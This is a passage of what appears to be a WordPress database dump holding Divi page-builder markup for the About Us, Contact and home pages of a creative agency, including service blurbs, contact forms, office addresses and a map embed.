header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-18 11:11:29','2020-08-18 11:11:29','',392,'https://wthtest1.in8.cdn-alpha.com/392-revision-v1/',0,'revision','',0),(770,1,'2021-02-09 10:24:26','0000-00-00 00:00:00','<!-- wp:divi/placeholder /-->','Landing Page','','draft','closed','closed','','','','','2021-02-09 10:24:26','2021-02-09 10:24:26','',0,'https://wthtest1.in8.cdn-alpha.com/?page_id=770',0,'page','',0),(771,1,'2021-02-09 10:24:23','2021-02-09 10:24:23','<!-- wp:divi/placeholder /-->','Landing Page','','inherit','closed','closed','','770-revision-v1','','','2021-02-09 10:24:23','2021-02-09 10:24:23','',770,'https://wthtest1.in8.cdn-alpha.com/770-revision-v1/',0,'revision','',0),(773,1,'2021-02-15 09:07:43','2021-02-15 09:07:43','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Bangalore</h4>\n&nbsp;\n\n<a href=\"mailto:bangalore@wthtest1.in8.cdn-alpha.com\">bangalore@wthtest1.in8.cdn-alpha.com</a>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Singapore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:singapore@wthtest1.in8.cdn-alpha.com\">singapore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_code _builder_version=\"4.5.5\" _module_preset=\"default\"]<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d14008.529292925106!2d77.138047!3d28.625796!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xff75c41354d8317!2sWhatTheHell%3F%20-%20Creative%20Agency%20-%20Digital%20Agency!5e0!3m2!1sen!2sin!4v1597054958439!5m2!1sen!2sin\" width=\"100%\" height=\"450\" frameborder=\"0\" style=\"border:0;\" allowfullscreen=\"\" aria-hidden=\"false\" tabindex=\"0\"></iframe>[/et_pb_fullwidth_code][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2021-02-15 09:07:43','2021-02-15 09:07:43','',401,'https://wthtest1.in8.cdn-alpha.com/401-revision-v1/',0,'revision','',0),(776,1,'2021-03-18 06:26:28','2021-03-18 06:26:28','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"creative agency\" title_text=\"main banner\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" hover_enabled=\"0\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" 